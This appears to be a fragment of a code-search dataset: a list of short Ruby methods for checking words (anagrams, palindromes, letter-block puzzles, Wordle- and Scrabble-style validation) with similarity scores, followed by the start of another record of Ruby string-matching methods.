"def is_word(word)\n if @trie.has_key?(word) == true && word.length > 2 && @words.include?(word) == false\n return true\n else\n return false\n end\nend",
"def is_valid_word?(word)\n DICTIONARY.include?(word)\n end",
"def word?(token)\n token =~ /^[A-Za-z]+$/\n end",
"def valid_word?(word, inner_letter, outer_letters)\n word.include?(inner_letter) && word.chars.uniq.all? {|l| @all_letters.chars.include?(l) }\n end",
"def check_word(str, word)\n if str == word\n puts \"Congratulations! You guessed my word correctly!\" \n @game_is_over = true\n else\n false\n end\t\n end",
"def block_word?(word)\n blocks = [%w(b o), %w(x k), %w(d q), %w(c p), %w(n a), %w(g t),\n %w(r e), %w(f s), %w(j w), %w(h u), %w(v i), %w(l y),\n %w(z m)]\n word.each_char do |chr|\n matching_block = blocks.find do |block|\n block.include?(chr.downcase)\n end\n if matching_block\n blocks.delete(matching_block)\n else\n return false\n end\n end\n \n true\nend",
"def invalid_word? word\n\t\tstopwords_list.collect{ |w| w if w.include? word.to_s.strip }.uniq.any?\n\tend",
"def negative?(word)\n [ 'dull',\n 'boring',\n 'annoying',\n 'chaotic'\n ].include?(word)\nend",
"def block_word?(string)\n letter_groups = %w(bo xk dq cp na gt re fs jw hu vi ly zm)\n letter_groups.map! do |letters|\n [letters, 'free']\n end\n\n blocks = letter_groups.to_h\n \n string.chars.each do |char|\n blocks.keys.each do |letters|\n if letters.include?(char.downcase)\n return false if blocks[letters] == 'used'\n blocks[letters] = 'used'\n end\n end\n end\n true\nend",
"def check_word(word)\n if self.player.word_list.include?(word)\n puts \"Already found that one!\"\n elsif word.length < 4\n puts \"That word is too short. Words must be 4 letters or longer.\"\n elsif word.chars.include?(self.board.inner_letter) == false\n puts \"Missing center letter.\"\n elsif self.board.word_list.include?(word)\n #get points total for word\n points = self.board.get_word_value(word)\n self.player.add_points(points)\n #adds word to wordlist\n self.player.add_word(word)\n if self.board.pangram?(word)\n puts \"🐝 PANGRAM FOUND 🐝\"\n puts \"The bees are pleased. #{points} added to your score.\"\n else\n puts \"#{self.nice_messages.sample} #{points} point#{\"s\" if points > 1} added to your score.\"\n end\n self.player.display_total\n else\n puts \"Not in word list :(\"\n end\n end",
"def words_the_same?(word_to_test)\n word_to_test.downcase == @word.downcase\n end",
"def word? word = ''\n is? :word, word\n end",
"def valid_word?(word)\n # Cleaner implementation, but less readable\n # (word.empty? && @is_complete_word) || (@sub_tries.key?(word[0]) &&\n # @sub_tries[word[0]].valid_word?(word[1..-1]))\n\n # TODO: Find a way to refactor this such that it looks cleaner while remaining readable\n if word.empty?\n @is_complete_word\n elsif @sub_tries.key?(word[0])\n @sub_tries[word[0]].valid_word?(word[1..-1])\n else\n false\n end\n end",
"def unigram_exists(word)\n\t$unigrams.each do |x|\n\t\tif x.matches(word)\n\t\t\tx.increase_count\n\t\t\treturn true\n\t\tend\t\n\tend\n\treturn false\nend",
"def anagram?(word)\n normalize(word) == normalize(@word)\n end",
"def block_word?(input)\n blocks = %w(bo xk dq cp na gt re fs jw hu vi ly zm)\n lowercase_input = input.downcase\n result = ''\n lowercase_input.each_char do |char|\n blocks.each do |block|\n if block.include?(char)\n result << char\n blocks.delete(block)\n end\n end\n end\n result == lowercase_input\nend",
"def valid_word?(spelling)\n return false unless super(spelling)\n\n return true if lexicon.member?(spelling)\n\n STEM_ENDINGS.each do |e|\n stem = spelling.chomp(e)\n return true if lexicon.member?(stem)\n end\n\n false\n end",
"def is_a_letter?(guess)\n return true if @word.include?(guess)\n return false\n end",
"def block_word?(str)\n ltrs = {\"B\"=>\"O\", \"X\"=>\"K\", \"D\"=>\"Q\", \"C\"=>\"P\", \"N\"=>\"A\", \"G\"=>\"T\", \"R\"=>\"E\", \"F\"=>\"S\", \"J\"=>\"W\", \"H\"=>\"U\", \"V\"=>\"I\", \"L\"=>\"Y\", \"Z\"=>\"M\" }\n list = str.upcase.split(\"\")\n list.each do |ltr|\n if ltrs.value?(ltr) || ltrs.key?(ltr)\n ltrs.delete_if{|k,v| k == ltr || v == ltr}\n else return false end\n end\n true\nend",
"def possible_palindrome?(word)\n nb_each_letters(word).one?(&:odd?) ||\n nb_each_letters(word).all?(&:even?)\nend",
"def CheckValidWord(word)\n letters = \"abcdefghijklmnopqrstuvwxyz\" # String that contains all of the letters of the alphabet, used to check for invalid words\n valid = true\n word = word.chomp.downcase\n if (word.split(//).size != 5) # If the size of the word is not 5 (this game only accepts 5 letter words) the words doesn't pass this check\n valid = false\n end\n word.split(//).each do |letter| # The word is split into letters and each letter is checked for validity\n if (word.count(letter.to_s)) > 1 # If the letter occurs more than once in the word, it doesn't pass this check\n valid = false\n end\n if (letters.include?(letter) == false) # If the letter isn't in \"letters\" is doesn't pass this check\n valid = false\n end\n end\n return valid # Returns the value of valid. Note: if a word/letter fails even one check, this value will be false\nend",
"def triangular_word?(str)\nend",
"def filter_invalid_word(word)\n # Define a string which includes all valid letter\n letters = \"abcdefghijklmnopqrstuvwxyz\"\n # Define return variable and give a default value\n valid = true\n # transfer the word to lowercase and take out off \\r\\n\n word = word.chomp.downcase\n # set return value as false if the length of word not exactly equal 5\n if (word.split(//).size != 5)\n valid = false\n end\n # loop each word\n word.split(//).each do |letter|\n # If the letter occurs more than once in the word, set return value to false\n if (word.count(letter.to_s)) > 1 \n valid = false\n end\n # If the letter does not included in valid letter, set return value to false\n if (letters.include?(letter) == false) \n valid = false\n end\n end\n # return a bool value to method\n return valid\n end",
"def word_has?(letter)\n @word.include? letter\n end",
"def anagram_word?(test_word)\n sort_word(@word) == sort_word(test_word)\n end",
"def is_possesive? word\n return true if $possesive_words.include? word.downcase\n return false\n end",
"def check(word)\n\t\tresult = find_word(word)\n\t\treturn \"NO SUGGESTION\" if result.empty?\n\t\t# if the word is in the results, just return it\n\t\treturn word if result.include? word\n\t\tmatches = result.grep(/^#{word}$/i)\n\t\t# if the word is there with swapped caps, return that\n\t\treturn matches.first if matches.size > 0\n\t\t# else return the first one\n\t\t# FIXME: simple selection of a \"good\" match. must improve it!\n\t\tresult.first\n\tend",
"def has_a_b?(word)\n if /b/.match(word)\n puts 'We have a match'\n else\n puts 'No match here...'\n end\nend",
"def secret_word_guessed?\n\t\t@secret_word.split(\"\").all? { |letter| @guessed_letters.include?(letter) }\n\tend",
"def gram? = unit == 'gram'",
"def matching?(word_to_match)\n anagram?(word_to_match) && !words_the_same?(word_to_match)\n end",
"def clean?( text )\n @clean_calls += 1\n @banned_words.each do |word|\n return false if text =~ /\\b#{word}\\b/\n end\n true\n end",
"def guessed?\n \t(word.split('') - selected_letters).empty?\n\tend",
"def is_word(word)\n\t lt = @children\n\t word.each_char { |c|\n\t\t if lt[c]\n\t\t\t lt = lt[c]\n\t\t\telse\n\t\t\t\treturn nil\n\t\t\tend\n\t\t}\n\t\tlt.word\n\tend",
"def rhyme?(a,b)\n as = a.gsub /\\W/,\"\"\n bs = b.gsub /\\W/,\"\"\n as.to_phrase.rhymes.flatten.join(\", \").include?(bs.to_phrase.rhymes.flatten.join(\", \")) &&\n (as.length + bs.length < 140)\nend",
"def block_word?(str)\n hsh = {\n 'B' => 'O',\n 'G' => 'T',\n 'V' => 'I',\n 'X' => 'K',\n 'R' => 'E',\n 'L' => 'Y',\n 'D' => 'Q',\n 'F' => 'S',\n 'Z' => 'M',\n 'C' => 'P',\n 'J' => 'W',\n 'N' => 'A',\n 'H' => 'U'\n }\n\n str.upcase.chars.each do |char|\n if hsh.keys.include?(char)\n hsh.delete(char)\n elsif hsh.values.include?(char)\n hsh.delete(hsh.key(char))\n else\n return false\n end\n # p hsh\n end\n true\nend",
"def triangular_word?(word)\n encoded = encode(word)\n triangular_num?(encoded)\nend",
"def palindrome_sentence? str\n short = str.gsub /[^a-zA-Z]/, \"\"\n palindrome_word? short\nend",
"def term_acceptable(t)\n if t.length < 3\n return false # too short, unacceptable\n elsif @stopwords.include?(t)\n return false # stopword, unacceptable\n else\n if (t =~ /\\d/) != 0\n return true # doesn't start with digit, acceptable\n else\n return 10*t.scan(/\\d/).length < 4*t.length # < 40% digits, acceptable\n end\n end\n end",
"def check_guess\n\t\t@word.include?(@guess)\n\n\tend",
"def find_bigrams(str, bigrams)\n bigrams.select { |bigram| str.include?(bigram)}\nend",
"def word_has?(letter)\r\n @word.include?(letter)\r\n end",
"def word_has?(letter)\n @word.include?(letter)\n end",
"def is_word?(fragment)\n dictionary.include?(fragment)\n end",
"def check_input(input_word)\n # Define a string which includes all valid letter\n dict = \"abcdefghijklmnopqrstuvwxyz\"\n # Define return variable and give a default value\n is_valid = true\n # set return value as false if the length of word not exactly equal 5\n if(input_word.split(//).size != 5)\n is_valid = false\n end\n # If the letter occurs more than once in the word, set return value to false\n # include? method to find if a letter is included in input_word\n input_word.split(//).each do |letter|\n if(dict.include?(letter) == false)\n is_valid = false\n end\n end # end of the each method\n return is_valid\n end",
"def block_word?(string)\n up_string = string.upcase\n BLOCKS.none? { |block| up_string.count(block) >= 2 }\nend",
"def clean?( text )\n\t\t@clean_calls += 1\n\t\t@banned_words.each do |word|\n\t\t\treturn false if text =~ /\\b#{word}\\b/\n\t\tend\n\t\ttrue\n\tend",
"def compare(word1, word2)\n bigram_compare(bigramate(word1), bigramate(word2))\n end",
"def match?(string)\n bigrams = get_bigrams(string)\n while bigrams.length > 1\n pair = bigrams.shift\n return true if bigrams[1..-1].include?(pair)\n end\nend",
"def anagrams?(word1, word2)\n if word1.length != word2.length\n return false\n end\n word1.each_char do |ele|\n if !word2.include?(ele)\n return false\n end\n end\n return true\nend",
"def screaming?(word)\n word_array = word.split(//)\n word_array[-1] == \"!\"\nend",
"def end_word?(word)\n !word.nil? && !(word =~ /^*+[?\\.!]$/).nil?\n end",
"def is_antigram? ()\n if (self.is_anagram? == \"These words are not anagrams\")\n @word1_letters.each do |letter|\n if (@word2_letters.include?(letter))\n return \"These words are not antigrams\"\n end\n end\n return \"These words are antigrams\"\n else\n return \"This word can't be an antigram since it is an anagram\"\n end\n end",
"def is_palindrome?(word)\n\n\n #\n # raise ArgumentError if !word.is_a?(String)\n # downcased_word = word.downcase.gsub(/\\W/,\"\")\n # return false if downcased_word.length < 2\n # downcased_word == downcased_word.reverse\n\n if word.class == String\n no_white_spaces = word.strip\n if no_white_spaces.to_i == 0 && no_white_spaces.length > 1 && no_white_spaces.length < 20\n no_white_spaces === no_white_spaces.reverse\n else\n return false\n end\n else\n raise ArgumentError\n end\nend",
"def triplets?(string)\n bigrams = get_bigrams(string)\n bigrams.each_with_index do |bigram, index|\n return false if index == bigrams.length - 1\n return true if bigram[0] == bigrams[index + 1][1]\n end\n false\nend",
"def is_word?\n not is_punctuation?\n end",
"def contains_anagrams?\n @phrase.split().group_by{ |e| e.chars.sort }.select{ |k, v| v.size > 1 }.any?\n end",
"def clean?( text )\n @clean_calls += 1\n @banned_words.each do |word|\n return false if text =~ /\\b#{word}\\b/\n end\n true\n end",
"def palindrome_word?(word)\n normalized = word.downcase\n normalized.reverse == normalized\nend",
"def antigram?\n (@first.downcase.gsub(/[^a-z0-9\\s]/i, '').split(\"\") & @second.downcase.gsub(/[^a-z0-9\\s]/i, '').split(\"\")).empty?\n end",
"def block_word?(string)\nblocks = [['B','O'], ['X','K'], ['D','Q'], ['C','P'], ['N','A'], ['G','T'], ['R','E'], ['F','S'], ['J','W'], ['H','U'],\n['V','I'], ['L','Y'], ['Z','M']]\nresult = []\nchars_array = string.chars\nblocks.each do |sub_array|\n chars_array.each do |letter|\n if sub_array.include?(letter.upcase)\n result << sub_array\n end\n end\nend\nresult == result.uniq ? true : false\nend",
"def is_word?(word)\n Constants::DICTIONARY.key?(word.downcase)\n end",
"def check_guess(word, guess)\n if word.include? guess\n @correct_guess = true\n\n elsif !word.include? guess\n @correct_guess = false\n end\nend",
"def mis_ramos\n\n\tend",
"def reserved_word?(str)\n RESERVED_WORDS.include?(str.downcase)\n end",
"def contains?(word)\n if word.length > 0\n if /lab/ =~ word\n puts \"#{word} contains the string 'lab'\"\n else\n puts \"Not in that word.\"\n end\n else\n puts \"Please specify a word.\"\n end\nend",
"def check_word(word, rack)\n if rack.include?(\"?\") ? blank_tile = true : blank_tile = false\n end\n # Make a copy of rack to use to change values.\n rack_copy = rack.clone\n # result equals true and only goes false if a letter from rack isn't in the word\n result = true\n word.chars do |letter|\n if rack_copy.include?(letter)\n # Find the first instance of letter by its index and delete it at index.\n # This must be down to avoid .include? returning true on a letter multiple\n # times\n rack_copy.delete_at(rack_copy.index(letter))\n # If the letter isn't in rack but theres a blank tile then go back to start\n # of loop\n elsif blank_tile\n # change to false to avoid using blank tile more than once\n blank_tile = false\n # if the letter doesn't exist than turn result to false and break loop\n else\n result = false\n break\n end\n end\n result\nend",
"def gentle?\n words.any?(&:is_positive?) || (length > 35)\n end",
"def pangram (instr)\n return (instr.split().join().downcase.split(\"\").uniq.length ==26) \nend",
"def valid_words(rack)\n # Load the words\n list_of_words = load_words\n array_of_valid_words = []\n # for each word check if all the letters of word are in rack\n list_of_words.each do |word|\n array_of_valid_words << word if check_word(word, rack)\n end\n array_of_valid_words\nend",
"def is_palindrome?(word)\nend",
"def bigramate(word)\n (0..(word.length - 2)).map { |i| word.slice(i, 2) }\n end",
"def is_all_this_letter?(word, character)\n a = is_all_as?(word)\n\n end",
"def round_over?\n is_word?(fragment)\n end",
"def valid_word?(word, letters)\n # take the word from user and split into Array of each letter\n input_word = word.upcase.split('')\n # iterate over the array of letters then\n # .all? checks each condition, returns T/F >>>\n # count of characters in input and the array @letters\n input_word.all? { |letter| input_word.count(letter) <= letters.count(letter) }\n end",
"def match?(longer_word, shorter_word = \"\")\n index = shorter_word.length - 1\n match = true\n temp = longer_word.dup\n while(index > -1 && match)\n if temp.include?(shorter_word[index])\n char = shorter_word[index]\n long_string_index = temp.index(char)\n temp[long_string_index] = ''\n index -= 1\n else\n match = false\n end\n end\n match\n end",
"def word_check(word)\n if word.length > 6\n return \"long\"\n elsif word.length < 6\n return \"short\"\n else\n return \"medium\"\n end\nend",
"def word_check(word)\n if word.length > 6\n return \"long\"\n elsif word.length < 6\n return \"short\"\n else\n return \"medium\"\n end\nend",
"def guessbrian(guess)\n #error checking\n if guess == nil || guess == \"\" || guess =='%'\n throw :guess\n end\n #initialize variables and split\n guess = guess.downcase\n flag = 0\n splitWord = @word\n splitWord = splitWord.downcase.split(\"\")\n #check and assign\n splitWord.each { |x|\n if x == guess\n flag = 1\n end\n }\n if flag == 1\n if @guesses == guess\n return false\n else\n @guesses << guess\n return true\n end\n else\n if guess == guess.gsub(/[^A-Za-z]/, '') && guess != @wrong_guesses\n @wrong_guesses << guess\n return true\n else\n return false\n end\n end\n end",
"def submit_word(word)\n letters_present_for(word) && @dictionary.include?(word)\n end"
] | [
"0.68942183",
"0.6835693",
"0.6639274",
"0.66050166",
"0.6576086",
"0.65585697",
"0.6549153",
"0.6535717",
"0.6491158",
"0.64656204",
"0.6460502",
"0.6431451",
"0.6418429",
"0.63703954",
"0.6333066",
"0.6326551",
"0.63233995",
"0.6312795",
"0.63071555",
"0.63029563",
"0.6286455",
"0.6268166",
"0.6256781",
"0.6224777",
"0.6224659",
"0.62149936",
"0.62114453",
"0.620889",
"0.6208385",
"0.6194492",
"0.6192301",
"0.61913335",
"0.6167454",
"0.61502504",
"0.613346",
"0.61275226",
"0.61164683",
"0.61122817",
"0.61086655",
"0.6078947",
"0.6076395",
"0.6076158",
"0.6072577",
"0.60649586",
"0.60609907",
"0.6060688",
"0.6039164",
"0.6036961",
"0.60340935",
"0.6028691",
"0.6028652",
"0.6018397",
"0.6017016",
"0.6004086",
"0.59941673",
"0.5990706",
"0.5979366",
"0.5975477",
"0.5972338",
"0.59680194",
"0.59651524",
"0.5951503",
"0.59462386",
"0.5941124",
"0.59388864",
"0.59346664",
"0.5927562",
"0.5922835",
"0.5922458",
"0.5912965",
"0.59068424",
"0.59057266",
"0.59024376",
"0.5882004",
"0.58772856",
"0.58769625",
"0.58745044",
"0.5873233",
"0.58714104",
"0.58659124",
"0.58636075",
"0.5843448",
"0.58424073",
"0.58396363",
"0.5836024",
"0.5833918",
"0.58320105",
"0.5827464",
"0.58254874",
"0.582216",
"0.58217305",
"0.58214",
"0.58173364",
"0.58150744",
"0.58132905",
"0.580409",
"0.5787412",
"0.5787412",
"0.57827616",
"0.57819676"
] | 0.8423245 | 0 |
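A quick usage sketch for a predicate like good_bigram? above. REJECT_BIGRAMS and the token list here are illustrative stand-ins, not values taken from the source repository:

REJECT_BIGRAMS = %w[of the and to].freeze

def good_bigram?(word)
  return false if REJECT_BIGRAMS.include?(word)
  return false if word.size < 2
  true
end

# Pair neighbouring tokens, then keep only pairs whose members pass the filter.
tokens = %w[a history of new york]
tokens.each_cons(2).select { |a, b| good_bigram?(a) && good_bigram?(b) }
# => [["new", "york"]]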
This method is accessible for testing only. | def configure_canonical(canonical_flag_type, canonical_value_type,
canonical_value_label, canonical_value_delim)
return unless flag_type.nil?
@flag_type = canonical_flag_type
return unless canonical_flag_type == :value
@value_type = canonical_value_type
canonical_value_delim = "" if canonical_value_delim == "=" && flag_style == :short
canonical_value_delim = "=" if canonical_value_delim == "" && flag_style == :long
@value_delim = canonical_value_delim
@value_label = canonical_value_label
label = @value_type == :optional ? "[#{@value_label}]" : @value_label
@canonical_str = "#{str_without_value}#{@value_delim}#{label}"
end | {
"objective": {
"self": [],
"paired": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
} | [
"def private; end",
"def private_method\n end",
"def refutal()\n end",
"def specie; end",
"def specie; end",
"def specie; end",
"def specie; end",
"def spec; end",
"def spec; end",
"def before_setup; end",
"def implementation; end",
"def implementation; end",
"def setup; end",
"def setup; end",
"def setup; end",
"def setup; end",
"def setup; end",
"def setup; end",
"def setup; end",
"def setup; end",
"def setup; end",
"def setup; end",
"def setup; end",
"def setup; end",
"def setup; end",
"def setup; end",
"def setup; end",
"def setup; end",
"def setup; end",
"def setup; end",
"def setup; end",
"def internal; end",
"def before_run; end",
"def used?; end",
"def ready; end",
"def ready; end",
"def self_test; end",
"def self_test; end",
"def pausable; end",
"def __dummy_test__\n end",
"def setup\n \n end",
"def setup\n \n end",
"def setup\n \n end",
"def setup\n \n end",
"def setup\n \n end",
"def setup\n \n end",
"def setup\n \n end",
"def schubert; end",
"def weber; end",
"def setup\n\n end",
"def setup\n\n end",
"def setup\n\n end",
"def testing\n # ...\n end",
"def init\n\n end",
"def initialize\n\n end",
"def initialize\n\n end",
"def strategy; end",
"def setup\n\t\t\t\t\t\t# Do nothing\n\t\t\t\tend",
"def setup\n\t\t\t\t\t\t# Do nothing\n\t\t\t\tend",
"def driver; end",
"def isolated; end",
"def isolated; end",
"def internal?; end",
"def probers; end",
"def setup\n # override this if needed\n end",
"def run; end",
"def run; end",
"def run; end",
"def run; end",
"def run; end",
"def run; end",
"def run; end",
"def run; end",
"def run; end",
"def at_init\n\n\t\tend",
"def initialize\n super()\n end",
"def setup\n end",
"def setup\n end",
"def setup\n end",
"def setup\n end",
"def setup\n end",
"def setup\n end",
"def initialize\r\n\r\n end",
"def initialize()\r\n\r\n end",
"def init; end",
"def init; end",
"def init; end",
"def init; end",
"def initialize\n end",
"def initialize\n end",
"def initialize\n end",
"def initialize\n end",
"def initialize\n end",
"def initialize\n end",
"def initialize\n end",
"def initialize\n end",
"def initialize\n end",
"def initialize\n end",
"def protected_method\n end",
"def handle; end",
"def initialize\n super\n end"
] | [
"0.7710882",
"0.6613679",
"0.63352877",
"0.62930155",
"0.62930155",
"0.62930155",
"0.62930155",
"0.62759215",
"0.62759215",
"0.6206897",
"0.6175529",
"0.6175529",
"0.61700815",
"0.61700815",
"0.61700815",
"0.61700815",
"0.61700815",
"0.61700815",
"0.61700815",
"0.61700815",
"0.61700815",
"0.61700815",
"0.61700815",
"0.61700815",
"0.61700815",
"0.61700815",
"0.61700815",
"0.61700815",
"0.61700815",
"0.61700815",
"0.61700815",
"0.6165245",
"0.6058807",
"0.60150236",
"0.5943375",
"0.5943375",
"0.59427243",
"0.59427243",
"0.59319127",
"0.59117156",
"0.59035534",
"0.59035534",
"0.59035534",
"0.59035534",
"0.59035534",
"0.59035534",
"0.59035534",
"0.5895585",
"0.5880138",
"0.58627087",
"0.58627087",
"0.58627087",
"0.58498514",
"0.5841898",
"0.5841274",
"0.5841274",
"0.58408105",
"0.5821093",
"0.5821093",
"0.5812179",
"0.58024734",
"0.58024734",
"0.5794532",
"0.5792814",
"0.5782811",
"0.5781056",
"0.5781056",
"0.5781056",
"0.5781056",
"0.5781056",
"0.5781056",
"0.5781056",
"0.5781056",
"0.5781056",
"0.57722557",
"0.5771002",
"0.5770548",
"0.5770548",
"0.5770548",
"0.5770548",
"0.5770548",
"0.5770548",
"0.57502383",
"0.5747836",
"0.5726744",
"0.5726744",
"0.5726744",
"0.5726744",
"0.57188666",
"0.57188666",
"0.57188666",
"0.57188666",
"0.57188666",
"0.57188666",
"0.57188666",
"0.57188666",
"0.57188666",
"0.57188666",
"0.57138073",
"0.5708527",
"0.5706904"
] | 0.0 | -1 |
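The delimiter defaulting in configure_canonical above is the subtle part: short flags drop the "=" separator while long flags require one. This isolated sketch reproduces just that rule so it can be exercised directly; the method name and inputs are hypothetical, not part of the original class:

def canonical_value_delim(flag_style, delim)
  delim = "" if delim == "=" && flag_style == :short # "-vVALUE", not "-v=VALUE"
  delim = "=" if delim == "" && flag_style == :long  # "--verbose=VALUE"
  delim
end

canonical_value_delim(:short, "=") # => ""
canonical_value_delim(:long, "")   # => "="

An optional value is then rendered in brackets, so a long flag with an optional value comes out as "--verbose=[VALUE]".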
Whether an exact match of the string was found | def found_exact?
@found_exact
end | {
"objective": {
"self": [],
"paired": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
} | [
"def matched?(str)\r\n # puts \">>> #{self.matcher.source}\"\r\n # puts \">>> #{str}\"\r\n return false if (!self.implicit && str[0] != \"!\")\r\n if (self.matcher =~ str) != nil\r\n $bot.last_match = $~\r\n $log.info(\"/#{self.matcher.source}/ matched #{str}\")\r\n return true\r\n end\r\n false\r\n end",
"def exact_match?\n search_settings = @settings['search']\n matching = search_settings.fetch('matching', 'pattern').normalize_matching\n matching == :exact\n end",
"def match? re, str\n re.match(str) != nil\n end",
"def ismatch(string)\n (string =~ @pattern) ? true : false\n end",
"def match?(str)\n !!(str =~ @regex)\n end",
"def match?(str)\n !!(str =~ @regex)\n end",
"def exact_match?\n !partial_match?\n end",
"def match? string\n match = false\n patterns.each{|p|\n p string, p, \"===\"\n if string =~ Regexp.new(p.content)\n match = true\n break\n end\n }\n return match\n end",
"def match_text text\n @lookups.each do |rx_curr|\n return true if text =~ rx_curr\n end\n false\n end",
"def exact_match?(name1:, name2:)\n return false unless name1.present? && name2.present?\n\n a = name_without_alias(name: name1.downcase)\n b = name_without_alias(name: name2.downcase)\n a == b\n end",
"def match?(str)\n query = query_obj(str)\n tag_query = query[:tag]\n class_query = query[:classes]\n prop_query = query[:properties]\n\n (tag_query.blank? || match_tag?( tag_query )) &&\n (class_query.blank? || match_class?( class_query )) &&\n (prop_query.blank? || match_prop?( prop_query ))\n end",
"def matching?(word_to_match)\n anagram?(word_to_match) && !words_the_same?(word_to_match)\n end",
"def match_a_b?(string)\n if /b/.match(string)\n puts \"we have a match\"\n else \n puts \"no match at all\"\n end\nend",
"def matches?(str1, str2)\n str1.start_with?(str2) || str2.start_with?(str1)\n end",
"def has_a_b?(string)\n if string =~ /b/\n puts \"MATCH!\"\n else\n puts \"No Match here!\"\n end\nend",
"def match? str, name\n rule = rule(name)\n raise \"no such rule: #{name.inspect}\" unless rule\n rest = rule.match? str\n return false unless rest && rest.empty?\n true\n end",
"def match?(name, literal) true end",
"def match_in_string?(string, regex)\n string.match(regex).class == MatchData\nend",
"def match_in_string?(string, regex)\n string.match(regex).class == MatchData\nend",
"def match_in_string?(string, regex)\n string.match(regex).class == MatchData\nend",
"def match_in_string?(string, regex)\n string.match(regex).class == MatchData\nend",
"def match_in_string?(string, regex)\n string.match(regex).class == MatchData\nend",
"def match_in_string?(string, regex)\n string.match(regex).class == MatchData\nend",
"def match_in_string?(string, regex)\n string.match(regex).class == MatchData\nend",
"def match_in_string?(string, regex)\n string.match(regex).class == MatchData\nend",
"def match_in_string?(string, regex)\n string.match(regex).class == MatchData\nend",
"def match_in_string?(string, regex)\n string.match(regex).class == MatchData\nend",
"def match_in_string?(string, regex)\n string.match(regex).class == MatchData\nend",
"def match_in_string?(string, regex)\n string.match(regex).class == MatchData\nend",
"def match_in_string?(string, regex)\n string.match(regex).class == MatchData\nend",
"def has_lab?(string)\n if /lab/i =~ string\n puts string\n else\n puts \"Not a match!\"\n end\nend",
"def matches? (search)\n if (search.nil? || search == \"\")\n return true\n end\n search = search.gsub(/[^0-9a-z ]/i, '').downcase\n searches = search.split(' ')\n \n searches.each do |word|\n word += ' '\n title = self.title.nil? ? ' ' : self.title.gsub(/[^0-9a-z ]/i, '').downcase + ' '\n description = self.description.nil? ? ' ' : self.description.gsub(/[^0-9a-z ]/i, '').downcase + ' '\n venue_name = self.venue.name.nil? ? ' ' : self.venue.name.gsub(/[^0-9a-z ]/i, '').downcase + ' '\n if !(title.include?(word) || description.include?(word) || venue_name.include?(word))\n return false\n end\n end\n\n return true\n end",
"def matches?(pattern); end",
"def exact_matches(search_word, string)\n regexp = Regexp.new(Regexp.escape(search_word), \"i\")\n return (string.scan(regexp) || []).length\n end",
"def has_a_b?(string)\n if string =~ /b/\n puts \"We have a match!\"\n else \n puts \"No match here.\"\n end\nend",
"def has_a_b?(string)\n if string =~ /b/\n puts 'We have a match!'\n else\n puts 'No match here.'\n end\nend",
"def has_a_b?(string)\n if string =~ /b/\n puts \"We have a match!\"\n else\n puts \"No match here.\"\n end\nend",
"def has_a_b?(string)\n if string =~ /b/\n puts \"We have a match!\"\n else\n puts \"No match here.\"\n end\nend",
"def match?(content)\n self.match.present? && content =~ /#{self.match}/\n end",
"def contained?(regexp)\n strings.find{ |x| x =~ regexp }\n end",
"def str_include?(str, target_str)\n tmp = target_str.downcase\n if !!str.match(/#{tmp}/i)\n return true\n else\n return false\n end\n end",
"def matches?(input)\n !!(regexp =~ input)\n end",
"def is? str\n !!match(str)\n end",
"def has_a_b?(string)\n if /b/.match(string)\n puts 'We have a match!'\n else\n puts 'No match here.'\n end\nend",
"def is_match(s, p)\n\treturn true if s == p\n\treturn true if s == \"*\" || p == \"*\"\n\tif s.length == p.length\n\t\tbooleans = []\n\t\ti = 0\n\t\twhile s.length > i\n\t\t\tbooleans << (s[i] == \"?\" || p[i] == \"?\" || s[i] == p[i])\n\t\t\ti += 1\n\t\tend\n\t\tbooleans.each do |statement|\n\t\t\treturn true if statement\n\t\tend\n\tend\n\tfalse\nend",
"def match_text(text, expected)\n unless text.match(/#{expected}/).nil?\n text.match(/#{expected}/)[0].to_s\n end\n\n false\n end",
"def article_match? (query, article_title)\n found = false\n return true if query.empty?\n temp_article = article_title.downcase\n query.each do |kw|\n pattern = Regexp.new /.*#{kw.downcase}.*/\n found = true if temp_article =~ pattern\n end\n found\nend",
"def matching_exactly_one_word\n /WRITE ME/\n end",
"def has_a_b?(string)\n\tif /b/.match(string)\n\t\tputs \"We have a match!\"\n\telse\n\t\tputs \"No match here.\"\n\tend\nend",
"def has_a_b?(string)\r\n if /b/.match(string) # =~ with /char/ you are looking for or .match is regex\r\n puts \"We have a match!\"\r\n else\r\n puts \"No match here.\"\r\n end\r\nend",
"def match?(string,number)\n\t\tmatch = string.match(@line[:regex])\n\t\tmatch ? process_match(match,number) : false\n\tend",
"def matches?(input_string)\n @word_list.include? input_string\n end",
"def has_a_b?(string)\n\tif string =~ /b/\n\t\tputs \"We have a match!\"\n\telse\n\t\tputs \"No match here.\"\n\tend\nend",
"def match?(name); end",
"def check_str(str,s)\n if str.include?s\n puts \"true\"\n else\n puts \"false\"\n end\nend",
"def textmatch(text, terms)\n terms.all? { |term| text =~ /#{term}/i }\nend",
"def contains?(word)\n if word.length > 0\n if /lab/ =~ word\n puts \"#{word} contains the string 'lab'\"\n else\n puts \"Not in that word.\"\n end\n else\n puts \"Please specify a word.\"\n end\nend",
"def apply?(str)\n !!(regexp.match(str))\n end",
"def matches?(value)\n !!(value.to_s =~ MATCHER)\n end",
"def has_a_b?(word)\n if /b/.match(word)\n puts 'We have a match'\n else\n puts 'No match here...'\n end\nend",
"def has_lab?(word)\n if /lab/.match(word)\n puts word\n else\n puts \"No match here.\"\n end\nend",
"def matches?(ref_name)\n return false if @ref_name_or_pattern.blank?\n\n exact_match?(ref_name) || wildcard_match?(ref_name)\n end",
"def valid?(string)\n r = Regexp.new(@matcher)\n \n !(string =~ r).nil?\n end",
"def exact_match?\r\n warning.nil?\r\n end",
"def exact_match?\r\n warning.nil?\r\n end",
"def check_in(word)\n if /lab/ =~ word\n puts word\n else\n puts \"No match\"\n end\nend",
"def check_in(word)\n if /lab/ =~ word\n puts word\n else\n puts \"No match\"\n end\nend",
"def check_in(word)\n if /lab/ =~ word\n puts word\n else\n puts \"No match\"\n end\nend",
"def include?(searchstring, substring)\n\nend",
"def check_string( str )\r\n result = false\r\n return result unless validate_string(str)\r\n\r\n if str.include?( self.pattern )\r\n result = true\r\n end\r\n return result\r\n end",
"def match?(string)\n bigrams = get_bigrams(string)\n while bigrams.length > 1\n pair = bigrams.shift\n return true if bigrams[1..-1].include?(pair)\n end\nend",
